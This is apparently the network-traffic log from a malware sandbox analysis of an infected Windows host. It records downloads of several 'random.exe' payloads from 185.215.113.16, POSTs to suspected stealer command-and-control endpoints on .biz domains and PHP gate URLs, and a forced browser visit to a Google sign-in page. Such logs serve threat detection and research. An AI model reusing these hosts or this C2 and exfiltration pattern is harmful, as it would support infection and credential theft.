Date: Sat, 07 Dec 2024 02:45:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 185.215.113.16:80
Request:
GET /luma/random.exe HTTP/1.1
Host: 185.215.113.16
Response:
HTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:44:54 GMT
Content-Type: application/octet-stream
Content-Length: 1830400
Last-Modified: Sat, 07 Dec 2024 02:16:12 GMT
Connection: keep-alive
ETag: "6753afec-1bee00"
Accept-Ranges: bytes
-
Remote address: 185.215.113.16:80
Request:
GET /steam/random.exe HTTP/1.1
Host: 185.215.113.16
Response:
HTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:44:57 GMT
Content-Type: application/octet-stream
Content-Length: 5173248
Last-Modified: Sat, 07 Dec 2024 02:16:21 GMT
Connection: keep-alive
ETag: "6753aff5-4ef000"
Accept-Ranges: bytes
-
Remote address: 185.215.113.16:80
Request:
GET /well/random.exe HTTP/1.1
Host: 185.215.113.16
Response:
HTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:45:06 GMT
Content-Type: application/octet-stream
Content-Length: 971264
Last-Modified: Sat, 07 Dec 2024 02:14:24 GMT
Connection: keep-alive
ETag: "6753af80-ed200"
Accept-Ranges: bytes
-
Remote address: 185.215.113.16:80
Request:
GET /off/random.exe HTTP/1.1
Host: 185.215.113.16
Response:
HTTP/1.1 200 OK
Date: Sat, 07 Dec 2024 02:45:10 GMT
Content-Type: application/octet-stream
Content-Length: 2766336
Last-Modified: Sat, 07 Dec 2024 02:14:50 GMT
Connection: keep-alive
ETag: "6753af9a-2a3600"
Accept-Ranges: bytes
-
Remote address: 8.8.8.8:53
Request: atten-supporse.biz IN A
Response: atten-supporse.biz IN A 104.21.16.9; atten-supporse.biz IN A 172.67.165.166
-
Remote address: 104.21.16.9:443
Request:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: atten-supporse.biz
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=818nekq9tromapg55ognkmvp1m; expires=Tue, 01-Apr-2025 20:31:36 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GmB2wHyeXmsnZ1romxLQMt4Wz1ymSdqVhPFQY6GVX7RWC3EbZ7c1al2bJbD4ZA9UFS5r9GduDWoYTrMwSbKT3Of3re284aNonUxDazIFTFTmOoI5WCEvC1sYin45kFaGUVFxaKk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ee12d416cb6cd22-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=32189&min_rtt=26250&rtt_var=17042&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2863&recv_bytes=586&delivery_rate=130669&cwnd=242&unsent_bytes=0&cid=02f989390392c673&ts=325&x=0"
-
Remote address: 8.8.8.8:53
Request: se-blurry.biz IN A
Response: se-blurry.biz IN A 172.67.162.65; se-blurry.biz IN A 104.21.81.153
-
Remote address: 172.67.162.65:443
Request:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: se-blurry.biz
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=kmltkhneqv2e17ahnjbfre8p2m; expires=Tue, 01-Apr-2025 20:31:36 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBRdLQqQSDJAlPFPKFclw3XL6KXS7A9OIzLWatZzMef5woeqzFgPcANHIOmRDL3nj8ClcsnCmaTDYbeSHB6yi7C6Z3RQSvQtpSRqg%2BAKEM8iApHttcPskEAP%2BG5sRhBI"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ee12d43caad48b9-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=27330&min_rtt=25758&rtt_var=8277&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=581&delivery_rate=134431&cwnd=253&unsent_bytes=0&cid=d323d40f3982bf5f&ts=231&x=0"
-
Remote address: 8.8.8.8:53
Request: zinc-sneark.biz IN A
Response: zinc-sneark.biz IN A 172.67.136.167; zinc-sneark.biz IN A 104.21.62.142
-
Remote address: 172.67.136.167:443
Request:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: zinc-sneark.biz
Response:
HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=inEuN20ha1ELB9jct%2BaMlWIAz6QkGeJZTP5pUrTefpGVnq91IJh%2BPoKR2O%2BJlE9OjGowL4rcYXpozbX1j70WUHrWv8rC%2BaX%2FTRgHN4ARpo2DQI3a6HS%2FjCAjsvCcgvJd4vo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ee12d464d40ed0b-LHR
-
Remote address: 172.67.136.167:443
Request:
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=qNIp90r.SHEYd_qmd_KFOgLmKOCHrYk2Bq1ZNwN6MgY-1733539497-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 53
Host: zinc-sneark.biz
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=fomo9eenelmm8fnrnbp8g375qt; expires=Tue, 01-Apr-2025 20:31:37 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cVG8hh10C4NXOm3Jk4bH3E%2BPfc9eUtCkZRWkb8QIwv1H%2Bnsq8ztyqs1NbYBIiUirGXwmfmOHjG8uzrP3AFH3Z%2FLyk6WxmhI%2BQRpNRQUKYfWdLdwZZSfXo1beOdGRG7kPYu0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ee12d48b8d0ed0b-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=33308&min_rtt=28239&rtt_var=7219&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8127&recv_bytes=1057&delivery_rate=286538&cwnd=257&unsent_bytes=0&cid=786a4ddf764d5cb4&ts=656&x=0"
-
Remote address: 185.215.113.206:80
Request:
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.215.113.206:80
Request:
POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGHCGCAEBFIJKFIDBGHD
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address: 8.8.8.8:53
Request
youtube.com IN A
Response
youtube.com IN A 216.58.213.14
-
Remote address: 8.8.8.8:53
Request
spocs.getpocket.com IN A
Response
spocs.getpocket.com IN CNAME prod.ads.prod.webservices.mozgcp.net
prod.ads.prod.webservices.mozgcp.net IN A 34.117.188.166
-
Remote address: 8.8.8.8:53
Request
getpocket.cdn.mozilla.net IN A
Response
getpocket.cdn.mozilla.net IN CNAME getpocket-cdn.prod.mozaws.net
getpocket-cdn.prod.mozaws.net IN CNAME prod.pocket.prod.cloudops.mozgcp.net
prod.pocket.prod.cloudops.mozgcp.net IN A 34.120.5.221
-
Remote address: 216.58.213.14:443
Request
GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
host: youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
-
Remote address: 8.8.8.8:53
Request
youtube.com IN A
Response
youtube.com IN A 216.58.213.14
-
GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
firefox.exe
Remote address: 34.120.5.221:443
Request
GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
host: getpocket.cdn.mozilla.net
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
if-none-match: W/"5388-z4f7VxffVE065aqbcDCq/QMZNSc"
te: trailers
-
Remote address: 8.8.8.8:53
Request
prod.pocket.prod.cloudops.mozgcp.net IN A
Response
prod.pocket.prod.cloudops.mozgcp.net IN A 34.120.5.221
-
Remote address: 8.8.8.8:53
Request
prod.ads.prod.webservices.mozgcp.net IN A
Response
prod.ads.prod.webservices.mozgcp.net IN A 34.117.188.166
-
Remote address: 8.8.8.8:53
Request
youtube.com IN AAAA
Response
youtube.com IN AAAA 2a00:1450:4009:816::200e
-
Remote address: 8.8.8.8:53
Request
prod.pocket.prod.cloudops.mozgcp.net IN AAAA
Response
prod.pocket.prod.cloudops.mozgcp.net IN AAAA 2600:1901:0:524c::
-
Remote address: 8.8.8.8:53
Request
prod.ads.prod.webservices.mozgcp.net IN AAAA
Response
-
Remote address: 8.8.8.8:53
Request
prod.content-signature-chains.prod.webservices.mozgcp.net IN A
Response
prod.content-signature-chains.prod.webservices.mozgcp.net IN A 34.160.144.191
-
Remote address: 8.8.8.8:53
Request
prod.content-signature-chains.prod.webservices.mozgcp.net IN AAAA
Response
prod.content-signature-chains.prod.webservices.mozgcp.net IN AAAA 2600:1901:0:92a9::
-
Remote address: 8.8.8.8:53
Request
shavar.prod.mozaws.net IN A
Response
shavar.prod.mozaws.net IN A 52.32.237.164
shavar.prod.mozaws.net IN A 52.33.23.190
shavar.prod.mozaws.net IN A 44.226.106.83
-
Remote address: 8.8.8.8:53
Request
shavar.prod.mozaws.net IN AAAA
Response
-
Remote address: 8.8.8.8:53
Request
www.youtube.com IN A
Response
www.youtube.com IN CNAME youtube-ui.l.google.com
youtube-ui.l.google.com IN A 172.217.169.78
youtube-ui.l.google.com IN A 216.58.213.14
youtube-ui.l.google.com IN A 216.58.201.110
youtube-ui.l.google.com IN A 216.58.212.206
youtube-ui.l.google.com IN A 172.217.169.14
youtube-ui.l.google.com IN A 142.250.200.46
youtube-ui.l.google.com IN A 142.250.187.206
youtube-ui.l.google.com IN A 172.217.16.238
youtube-ui.l.google.com IN A 142.250.179.238
youtube-ui.l.google.com IN A 142.250.178.14
youtube-ui.l.google.com IN A 172.217.169.46
youtube-ui.l.google.com IN A 142.250.200.14
youtube-ui.l.google.com IN A 142.250.180.14
youtube-ui.l.google.com IN A 216.58.204.78
youtube-ui.l.google.com IN A 142.250.187.238
-
Remote address: 8.8.8.8:53
Request
prod.remote-settings.prod.webservices.mozgcp.net IN A
Response
prod.remote-settings.prod.webservices.mozgcp.net IN A 34.149.100.209
-
Remote address: 8.8.8.8:53
Request
youtube-ui.l.google.com IN A
Response
youtube-ui.l.google.com IN A 142.250.178.14
youtube-ui.l.google.com IN A 172.217.169.14
youtube-ui.l.google.com IN A 142.250.180.14
youtube-ui.l.google.com IN A 142.250.187.206
youtube-ui.l.google.com IN A 172.217.169.78
youtube-ui.l.google.com IN A 142.250.200.14
youtube-ui.l.google.com IN A 216.58.204.78
youtube-ui.l.google.com IN A 142.250.179.238
youtube-ui.l.google.com IN A 216.58.201.110
youtube-ui.l.google.com IN A 142.250.187.238
youtube-ui.l.google.com IN A 172.217.169.46
youtube-ui.l.google.com IN A 172.217.16.238
youtube-ui.l.google.com IN A 216.58.213.14
youtube-ui.l.google.com IN A 216.58.212.206
youtube-ui.l.google.com IN A 142.250.200.46
-
Remote address: 8.8.8.8:53
Request
prod.remote-settings.prod.webservices.mozgcp.net IN AAAA
Response
-
Remote address: 8.8.8.8:53
Request
youtube-ui.l.google.com IN AAAA
Response
youtube-ui.l.google.com IN AAAA 2a00:1450:4009:819::200e
youtube-ui.l.google.com IN AAAA 2a00:1450:4009:817::200e
youtube-ui.l.google.com IN AAAA 2a00:1450:4009:80a::200e
youtube-ui.l.google.com IN AAAA 2a00:1450:4009:818::200e
-
Remote address: 8.8.8.8:53
Request
consent.youtube.com IN A
Response
consent.youtube.com IN A 142.250.200.14
-
GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
firefox.exe
Remote address: 142.250.200.14:443
Request
GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
host: consent.youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: SOCS=CAAaBgiAoM66Bg
cookie: YSC=XAJHfiMqzLQ
cookie: __Secure-YEC=Cgt5cVZqVnpxYWY5NCi57c66BjIKCgJHQhIEGgAgFw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFw%3D%3D
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
-
Remote address: 8.8.8.8:53
Request
consent.youtube.com IN A
Response
consent.youtube.com IN A 142.250.200.14
-
Remote address: 8.8.8.8:53
Request
consent.youtube.com IN AAAA
Response
consent.youtube.com IN AAAA 2a00:1450:4009:822::200e
-
Remote address: 8.8.8.8:53
Request
firefox-settings-attachments.cdn.mozilla.net IN A
Response
firefox-settings-attachments.cdn.mozilla.net IN CNAME attachments.prod.remote-settings.prod.webservices.mozgcp.net
attachments.prod.remote-settings.prod.webservices.mozgcp.net IN A 34.117.121.53
-
Remote address: 8.8.8.8:53
Request
attachments.prod.remote-settings.prod.webservices.mozgcp.net IN A
Response
attachments.prod.remote-settings.prod.webservices.mozgcp.net IN A 34.117.121.53
-
Remote address: 8.8.8.8:53
Request
attachments.prod.remote-settings.prod.webservices.mozgcp.net IN AAAA
Response
-
Remote address: 8.8.8.8:53
Request
www.google.com IN A
Response
www.google.com IN A 142.250.187.196
-
Remote address: 142.250.187.196:443
Request
GET /favicon.ico HTTP/2.0
host: www.google.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://consent.youtube.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
-
Remote address: 8.8.8.8:53
Request
www.google.com IN A
Response
www.google.com IN A 142.250.187.196
-
Remote address: 8.8.8.8:53
Request
www.google.com IN AAAA
Response
www.google.com IN AAAA 2a00:1450:4009:81f::2004
-
Remote address: 8.8.8.8:53
Request
consent.youtube.com IN A
Response
consent.youtube.com IN A 142.250.200.14
-
Remote address: 8.8.8.8:53
Request
consent.youtube.com IN A
Response
consent.youtube.com IN A 142.250.200.14
-
Remote address: 8.8.8.8:53
Request
prod.balrog.prod.cloudops.mozgcp.net IN A
Response
prod.balrog.prod.cloudops.mozgcp.net IN A 35.244.181.201
-
Remote address: 8.8.8.8:53
Request
prod.balrog.prod.cloudops.mozgcp.net IN AAAA
Response
-
Remote address: 8.8.8.8:53
Request
prod.remote-settings.prod.webservices.mozgcp.net IN A
Response
prod.remote-settings.prod.webservices.mozgcp.net IN A 34.149.100.209
-
Remote address: 8.8.8.8:53
Request
ciscobinary.openh264.org IN A
Response
ciscobinary.openh264.org IN CNAME a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com IN CNAME a17.rackcdn.com
a17.rackcdn.com IN CNAME a17.rackcdn.com.mdc.edgesuite.net
a17.rackcdn.com.mdc.edgesuite.net IN CNAME a19.dscg10.akamai.net
a19.dscg10.akamai.net IN A 88.221.134.209
a19.dscg10.akamai.net IN A 88.221.134.155
-
GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
firefox.exe
Remote address: 88.221.134.209:80
Request
GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Response
HTTP/1.1 200 OK
ETag: 85430baed3398695717b0263807cf97c
Content-Length: 453023
Accept-Ranges: bytes
X-Timestamp: 1731034347.00215
Content-Type: application/zip
X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
Cache-Control: public, max-age=61851
Expires: Sat, 07 Dec 2024 19:56:26 GMT
Date: Sat, 07 Dec 2024 02:45:35 GMT
Connection: keep-alive
-
Remote address: 8.8.8.8:53
Request
a19.dscg10.akamai.net IN A
Response
a19.dscg10.akamai.net IN A 88.221.134.155
a19.dscg10.akamai.net IN A 88.221.134.209
-
Remote address: 8.8.8.8:53
Request
a19.dscg10.akamai.net IN AAAA
Response
a19.dscg10.akamai.net IN AAAA 2a02:26f0:a1::58dd:869b
a19.dscg10.akamai.net IN AAAA 2a02:26f0:a1::58dd:86d1
-
Remote address: 8.8.8.8:53
Request
redirector.gvt1.com IN A
Response
redirector.gvt1.com IN A 142.250.180.14
-
Remote address: 8.8.8.8:53
Request
redirector.gvt1.com IN A
Response
redirector.gvt1.com IN A 142.250.180.14
-
Remote address: 8.8.8.8:53
Request
redirector.gvt1.com IN AAAA
Response
redirector.gvt1.com IN AAAA 2a00:1450:4009:81e::200e
-
Remote address: 8.8.8.8:53
Request
r1---sn-5hnekn76.gvt1.com IN A
Response
r1---sn-5hnekn76.gvt1.com IN CNAME r1.sn-5hnekn76.gvt1.com
r1.sn-5hnekn76.gvt1.com IN A 209.85.226.6
-
Remote address: 8.8.8.8:53
Request
r1.sn-5hnekn76.gvt1.com IN A
Response
r1.sn-5hnekn76.gvt1.com IN A 209.85.226.6
-
Remote address: 8.8.8.8:53
Request
r1.sn-5hnekn76.gvt1.com IN AAAA
Response
r1.sn-5hnekn76.gvt1.com IN AAAA 2a00:1450:400e::6
-
Remote address: 8.8.8.8:53
Request
play.google.com IN A
Response
play.google.com IN A 142.250.179.238
-
Remote address: 142.250.179.238:443
Request
POST /log?hasfast=true&authuser=0&format=json HTTP/2.0
host: play.google.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://consent.youtube.com/
content-type: text/plain;charset=UTF-8
content-length: 743
origin: https://consent.youtube.com
sec-fetch-dest: empty
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
-
Remote address: 8.8.8.8:53
Request
play.google.com IN A
Response
play.google.com IN A 142.250.179.238
-
Remote address: 8.8.8.8:53
Request
play.google.com IN AAAA
Response
play.google.com IN AAAA 2a00:1450:4009:81d::200e
-
Remote address: 8.8.8.8:53
Request
consent.youtube.com IN A
Response
consent.youtube.com IN A 142.250.200.14
-
Remote address: 8.8.8.8:53
Request
consent.youtube.com IN A
Response
consent.youtube.com IN A 142.250.200.14
-
2.2kB 2.0kB 22 12
HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.php
HTTP Response
200
HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.php
HTTP Response
200
HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.php
HTTP Response
200
HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.php
HTTP Response
200
HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.php
HTTP Response
200
HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.php
HTTP Response
200
-
221.6kB 11.1MB 4448 7922
HTTP Request
GET http://185.215.113.16/luma/random.exe
HTTP Response
200
HTTP Request
GET http://185.215.113.16/steam/random.exe
HTTP Response
200
HTTP Request
GET http://185.215.113.16/well/random.exe
HTTP Response
200
HTTP Request
GET http://185.215.113.16/off/random.exe
HTTP Response
200
-
982 B 4.4kB 9 9
HTTP Request
POST https://atten-supporse.biz/api
HTTP Response
200
-
977 B 4.3kB 9 9
HTTP Request
POST https://se-blurry.biz/api
HTTP Response
200
-
1.7kB 9.9kB 14 16
HTTP Request
POST https://zinc-sneark.biz/api
HTTP Response
403
HTTP Request
POST https://zinc-sneark.biz/api
HTTP Response
200
-
727 B 625 B 5 5
HTTP Request
GET http://185.215.113.206/
HTTP Response
200
HTTP Request
POST http://185.215.113.206/c4becf79229cb002.php
HTTP Response
200
-
216.58.213.14:443
https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
tls, http2
firefox.exe
1.9kB 9.0kB 14 19
HTTP Request
GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
-
34.120.5.221:443
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
tls, http2
firefox.exe
2.0kB 12.9kB 17 18
HTTP Request
GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
-
977 B 6.9kB 10 8
-
-
-
142.250.200.14:443
https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
tls, http2
firefox.exe
2.9kB 65.2kB 32 59
HTTP Request
GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
-
1.8kB 21.3kB 19 26
-
1.8kB 7.5kB 14 18
HTTP Request
GET https://www.google.com/favicon.ico
-
88.221.134.209:80
http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
http
firefox.exe
5.5kB 467.5kB 114 349
HTTP Request
GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
HTTP Response
200
-
1.6kB 8.9kB 16 21
-
124.3kB 8.7MB 2288 6256
-
142.250.179.238:443
https://play.google.com/log?hasfast=true&authuser=0&format=json
tls, http2
firefox.exe
2.8kB 8.7kB 18 20
HTTP Request
POST https://play.google.com/log?hasfast=true&authuser=0&format=json
-
64 B 96 B 1 1
DNS Request
atten-supporse.biz
DNS Response
104.21.16.9
172.67.165.166
-
59 B 91 B 1 1
DNS Request
se-blurry.biz
DNS Response
172.67.162.65
104.21.81.153
-
61 B 93 B 1 1
DNS Request
zinc-sneark.biz
DNS Response
172.67.136.167
104.21.62.142
-
57 B 73 B 1 1
DNS Request
youtube.com
DNS Response
216.58.213.14
-
65 B 131 B 1 1
DNS Request
spocs.getpocket.com
DNS Response
34.117.188.166
-
71 B 174 B 1 1
DNS Request
getpocket.cdn.mozilla.net
DNS Response
34.120.5.221
-
57 B 73 B 1 1
DNS Request
youtube.com
DNS Response
216.58.213.14
-
82 B 98 B 1 1
DNS Request
prod.pocket.prod.cloudops.mozgcp.net
DNS Response
34.120.5.221
-
82 B 98 B 1 1
DNS Request
prod.ads.prod.webservices.mozgcp.net
DNS Response
34.117.188.166
-
57 B 85 B 1 1
DNS Request
youtube.com
DNS Response
2a00:1450:4009:816::200e
-
82 B 110 B 1 1
DNS Request
prod.pocket.prod.cloudops.mozgcp.net
DNS Response
2600:1901:0:524c::
-
82 B 175 B 1 1
DNS Request
prod.ads.prod.webservices.mozgcp.net
-
103 B 119 B 1 1
DNS Request
prod.content-signature-chains.prod.webservices.mozgcp.net
DNS Response
34.160.144.191
-
103 B 131 B 1 1
DNS Request
prod.content-signature-chains.prod.webservices.mozgcp.net
DNS Response
2600:1901:0:92a9::
-
68 B 116 B 1 1
DNS Request
shavar.prod.mozaws.net
DNS Response
52.32.237.164
52.33.23.190
44.226.106.83
-
68 B 153 B 1 1
DNS Request
shavar.prod.mozaws.net
-
3.7kB 11.0kB 10 14
-
61 B 335 B 1 1
DNS Request
www.youtube.com
DNS Response
172.217.169.78
216.58.213.14
216.58.201.110
216.58.212.206
172.217.169.14
142.250.200.46
142.250.187.206
172.217.16.238
142.250.179.238
142.250.178.14
172.217.169.46
142.250.200.14
142.250.180.14
216.58.204.78
142.250.187.238
-
94 B 110 B 1 1
DNS Request
prod.remote-settings.prod.webservices.mozgcp.net
DNS Response
34.149.100.209
-
69 B 309 B 1 1
DNS Request
youtube-ui.l.google.com
DNS Response
142.250.178.14
172.217.169.14
142.250.180.14
142.250.187.206
172.217.169.78
142.250.200.14
216.58.204.78
142.250.179.238
216.58.201.110
142.250.187.238
172.217.169.46
172.217.16.238
216.58.213.14
216.58.212.206
142.250.200.46
-
94 B 187 B 1 1
DNS Request
prod.remote-settings.prod.webservices.mozgcp.net
-
69 B 181 B 1 1
DNS Request
youtube-ui.l.google.com
DNS Response
2a00:1450:4009:819::200e
2a00:1450:4009:817::200e
2a00:1450:4009:80a::200e
2a00:1450:4009:818::200e
-
3.3kB 9.2kB 7 9
-
65 B 81 B 1 1
DNS Request
consent.youtube.com
DNS Response
142.250.200.14
-
65 B 81 B 1 1
DNS Request
consent.youtube.com
DNS Response
142.250.200.14
-
65 B 93 B 1 1
DNS Request
consent.youtube.com
DNS Response
2a00:1450:4009:822::200e
-
90 B 177 B 1 1
DNS Request
firefox-settings-attachments.cdn.mozilla.net
DNS Response
34.117.121.53
-
106 B 122 B 1 1
DNS Request
attachments.prod.remote-settings.prod.webservices.mozgcp.net
DNS Response
34.117.121.53
-
4.0kB 10.6kB 9 14
-
106 B 199 B 1 1
DNS Request
attachments.prod.remote-settings.prod.webservices.mozgcp.net
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
142.250.187.196
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
142.250.187.196
-
60 B 88 B 1 1
DNS Request
www.google.com
DNS Response
2a00:1450:4009:81f::2004
-
3.1kB 9.3kB 6 10
-
65 B 81 B 1 1
DNS Request
consent.youtube.com
DNS Response
142.250.200.14
-
65 B 81 B 1 1
DNS Request
consent.youtube.com
DNS Response
142.250.200.14
-
82 B 98 B 1 1
DNS Request
prod.balrog.prod.cloudops.mozgcp.net
DNS Response
35.244.181.201
-
